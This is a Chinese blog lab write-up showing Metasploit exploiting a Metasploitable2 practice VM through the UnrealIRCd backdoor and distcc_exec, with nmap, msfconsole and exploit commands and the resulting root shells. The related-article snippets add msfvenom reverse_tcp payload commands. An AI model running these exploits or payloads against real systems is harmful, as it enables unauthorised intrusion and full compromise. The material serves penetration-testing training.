Metasploit攻击linux实例

最新推荐文章于 2024-07-15 14:23:16 发布
最新推荐文章于 2024-07-15 14:23:16 发布
阅读量3.2k 收藏 14
点赞数 4
文章标签: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjxsir/article/details/111866420
版权

一、实验目的
通过该实验了解Metasploit的基本框架,掌握metasploit攻击操作系统的一般方法
二、实验环境
在这里插入图片描述
漏洞主机:linux, IP 地址:10.1.1.136
攻击主机:Kali linux, IP地址:10.1.1.141

三、实验内容与实验要求
初步了解实验环境及漏洞信息搜集
利用UnrealIRCd后门漏洞攻击漏洞主机
利用Distcc后门漏洞攻击Metasploitable2漏洞主机
Distcc后门漏洞

四、实验过程与分析
查看Metasploitable2漏洞主机的登录用户及网络配置信息,从下图2可以看出漏洞主机登陆用户为msfadmin ,IP为192.168.220.136。使用命令如下:
whoami 查看当前登陆用户
ifconfig 查看网络配置信息
在这里插入图片描述
图2 查询漏洞主机信息
可以看出漏洞主机登陆用户为msfadmin ,IP为192.168.220.136。
查看攻击者主机登陆用户及网络配置信息,从下图3可以看出攻击主机登陆用户为root ,IP为192.168.220.141
whoami 查看当前登陆用户
ifconfig 查看网络配置信息
在这里插入图片描述
图3 查询攻击主机信息
扫描漏洞主机开放的端口,根据开放端口信息判断漏洞主机存在的安全问题。扫描结果如图4所示。执行Nmap对漏洞主机进行扫描,下述命令中各参数含义如下:-sT表示tcp端口扫描(完整三次握手),-v表示显示详细信息-v。使用命令:
利用口令: nmap -sT -v 192.168.220.136 扫描漏洞主机开发端口信息,扫描结果如下:
在这里插入图片描述
图4 扫描漏洞主机开发端口
实验步骤二
UnrealIRCd后门漏洞简介
安全组织索引
CVE:CVE-2010-2075
BID:BID-40820
OSVDB:OSVDB-65445
原理
在2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。
参考链接
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
影响系统/软件
Unreal UnrealIRCd 3.2.8.1
攻击步骤
分析可以利用的漏洞
Nmap扫描结果如图5所示,漏洞主机开启了大量的端口,也就意味着对外提供了大量的服务,增加了被攻击的风险。其中6667号端口开放IRC服务,可以利用UnrealIRCD IRC软件的漏洞来攻击漏洞主机。
在这里插入图片描述
图5 扫描漏洞主机开发端口对应协议
开启Msfconsole
运行“msfconsole”命令开启msf,图6为MSF启动后的初始化界面,从图中可以看出v4.8.2-2014010101版本Metasploit包括了1246个EXP,678个辅助模块,324个负载,32个编码器,8个无操作生成器。
在这里插入图片描述

搜索漏洞利用EXP
运行“search unrealircd”命令搜索关于UnrealIRCD漏洞的利用信息
在这里插入图片描述

运行漏洞利用EXP
运行“use exploit/unix/irc/unreal_ircd_3281_backdoor”命令开始运行EXP
在这里插入图片描述
使用’show options’ 命令查看该exploit的参数设置信息,发现执行该EXP前可以配置漏洞主机的IP和端口
在这里插入图片描述

设置漏洞主机IP
运行“set RHOST 192.168.220.136 ”命令设置漏洞主机IP
在这里插入图片描述

  附:该EXP默认端口为6667,与Metasploitable2漏洞主机开启IRC服务的端口一致,所以不用修改端口。

执行EXP
运行“exploit”命令,提示“Command shell session 1 opened (192.168.220.141:4444 -> 192.168.220.136:44972) at 2014-11-27 19:28:45 +0800”说明攻击成功,成功建立shell回话。
在这里插入图片描述

验证shell权限
运行linux系统命令“whoami”,回显“root”说明当前shell的权限是root权限,可进行任意操作而不受权限控制。
在这里插入图片描述

实验步骤三
安全组织索引
CVE:CVE-2004-2687
BID:无
OSVDB:OSVDB-13378
原理
Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制。
参考链接如下:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-2687
http://metasploit.com/modules/exploit/unix/misc/distcc_exec
影响系统/软件
distcc 2.x
利用步骤
在kali中执行“msfconsole”命令,启动metasploit
在这里插入图片描述
运行命令:“ use exploit/unix/misc/distcc_exec”选择漏洞利用EXP
在这里插入图片描述
运行命令:“set RHOST 192.168.220.136”,设置漏洞主机的IP
在这里插入图片描述
运行命令:“exploit”,开始攻击,出现“Command shell session 1 opened (192.168.220.141:4444 -> 192.168.220.136:58669) at 2014-11-27 20:00:27 +0800”说明shell建立成功
在这里插入图片描述
运行命令:“whoami”验证创立的shell的权限
在这里插入图片描述

白玉瑕
关注
2021-08-29 网安实验-Linux系统渗透测试之Metasploit攻击linux实例
时光隧道
08-29 8万+
一:扫描端口 nmap -sT -v 10.1.1.136 扫描漏洞主机开放端口信息,扫描结果如下: 其中6667号端口开放IRC服务,可以利用UnrealIRCD IRC软件的漏洞来攻击漏洞主机。 二:UnrealIRCd后门漏洞 1.输入msfconsole命令 2.运行“search unrealircd”命令 3.运行“use exploit/unix/irc/unreal_ircd_3281_backdoor”命令开始运行EXP 4.使用“show options“ 命令查看该expl
Metasploit攻击winserver2008实例
qwerzxcvb123的博客
03-31 3453
Metasploit攻击winserver2008实例 一、实验目的 1)了解拒绝服务攻击的原理及其危害 2)了解SMB协议及其漏洞信息 3)使用Metasploit对win2008系统进行拒绝服务攻击 二、实验环境 漏洞主机:win server 2008,IP地址:10.1.1.144 攻击主机:Kali linux,IP地址:10.1.1.128 三、实验内容与实验要求 初步了解实验环境及...
使用metasploitlinux系统进行渗透测试提权
渗透测试
05-13 2295
文章目录前言一、生成攻击载荷二、获取目标主机物理访问权限三、加载主控端handler总结 前言 使用metasploitlinux系统进行渗透测试 一、生成攻击载荷 使用msfvenom命令创建一个elf文件 ┌──(root????kali)-[~] └─# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.113 lport=5555 -f elf>pay.elf [-] No platform was selecte
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
07-15 913
通过本篇文章,我们将会学习以下内容:1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux中使用 Metasploit4、升级Kali Linux5、使用虚拟化软件构建渗透测试实验环境6、配置SSH连接7、使用SSH连接Kali8、配置PostgreSQL数据库9、创建工作区10、使用数据库11、使用hosts命令12、理解services命令。
客户端渗透之——使用Metasploit实现对Linux客户端的渗透
冰河的专栏
01-24 6717
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86633254 攻击机 Kali 192.168.175.128 靶机 CentOS 6.5 192.168.175.132 1.生成elf文件 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.175...
MetaSploit攻击实例讲解------Metasploit自动化攻击(包括kali linux 2016.2(rolling) 和 BT5)...
weixin_34062329的博客
05-20 5660
       不多说,直接上干货!           前期博客 Kali linux 2016.2(Rolling)里Metasploit连接(包括默认和自定义)的PostgreSQL数据库 Kali linux 2016.2(Rolling)里Metasploit连接(包括默认和自定义)的PostgreSQL数据库之后的切换到指定的工作空间 msf > ...
metasploit利用linux漏洞,Metasploit发布针对BlueKeep漏洞的公共攻击模块(CVE-2019-0708)
weixin_39914938的博客
05-16 168
众所周知的渗透测试框架Metasploit最近在其开发模块中为高风险漏洞BlueKeep添加了一个利用模块。BlueKeep编号为CVE-2019-0708,这是今年5月发现的一个高风险漏洞。它是一种可以利用Windows远程桌面服务(RDS)以类似于2017年使用WannaCry勒索软件传播恶意程序的蠕虫。攻击者可以利用此漏洞执行任意代码,并通过远程桌面协议(RDP)发送特制请求,以在无需用户交...
Metasploit攻击win7实例——利用MS11_003 IE漏洞攻击win7主机
weixin_47731659的博客
01-19 1881
攻击流程 环境配置: 漏洞主机:win7,IP地址:10.1.1.129 攻击主机:Kali linux,IP地址:10.1.1.128 使用工具: Nessus+metasploit 利用Nessus扫描目标主机 启动Nessus服务 /etc/init.d/nessusd start 访问Nessus控制端https://127.0.0.1:8834/ 配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描
Metasploit简单利用及入侵Windows7案例.docx
11-13
- **攻击机准备**:实验使用的攻击机系统为Kali Linux虚拟机。 - **漏洞探测步骤**: - **调用扫描模块**:首先调用`auxiliary/scanner/smb/smb_ms17_010`模块,该模块用于检测目标系统是否受MS17_010漏洞的影响。 ...
Metasploit后门渗透Linux系统以及跨平台后门生成
jazzz98的博客
10-10 388
6.准备进行ssh爆破:设置用户名字典和密码字典的路径;设置靶机的IP地址;1.实验原理:靶机root用户存在弱口令漏洞,利用枚举的方法破解目标主机ssh服务。5.建立用户名字典及密码字典(为了减少爆破时间,用户名及密码设置特定的几个即可)发现22端口开放,其应用程序为ssh。得到靶机的操作系统及版本号。7.等待ssh爆破执行完毕。
metasploitable-linux-2.0.0.zip
09-01
metasploitable-linux,metasploitable-linuxmetasploitable-linux metasploitable-linux
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,以便进一步利用。   下面是具体的利用方法。   我们可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:   产生webshell   msfpayload windows/meterpret
metasploitlinux篇)
weixin_30527143的博客
04-25 98
1,安装 apt-get install metasploit-framework 2,初始化数据库 msfdb_init 3,启动 service postgresql start msfconsole 3,升级 msfupdate 4.建立缓存 db_rebuild_cache 转载于:https://www.cnblogs.com/dggr/...
Linux-Metasploit 渗透-魔鬼教程
m0_74025111的博客
04-20 2998
这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞,换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。进行专业的渗透测试后,即使是系统未被攻破,也可以证明先前实行的防御是有效的,专业的渗透测试可以有效评估系统的安全状况,并提出合理的改进方案。用方法 -p 端口号) -sV 扫描服务器版本。
Metasploit渗透测试手册》—第3章3.7节 对Linux(Ubuntu)机器进行攻击渗透
weixin_34199405的博客
05-02 263
本节书摘来自异步社区《Metasploit渗透测试手册》一书中的第3章3.7节 对Linux(Ubuntu)机器进行攻击渗透,作者【印度】Abhinav Singh,更多章节内容可以访问云栖社区“异步社区”公众号查看。 3.7 对Linux(Ubuntu)机器进行攻击渗透Metasploit渗透测试手册Linux是继Windows之后应用广泛的操作系统之...
进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器
weixin_43263566的博客
01-06 6974
Kali最强渗透工具- metasploit
Linux安装Metasploit与简单介绍
littleyy666的博客
07-29 1748
MSF安装
在KaLi Linux中使用Metasploit
sheaadens的博客
06-21 470
因此,使用Metasploit来爆破Tomcat密码,以找到计算机系统中存在的可能的漏洞和安全风险,将是非常有用的。其中,指定了目标IP地址,以及Tomcat服务器默认的8080端口,同时设置了强制暴力破解的速度。你可以打开Metasploit中的控制台,并使用漏洞扫描程序,例如Nmap,扫描目标计算机系统的IP地址,并以此查找Tomcat服务器存在的漏洞。如果你已经找到了Tomcat服务器中的漏洞,你可以使用Metasploit攻击模块来创建一个加密的Payload,以便能够访问Tomcat服务器。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值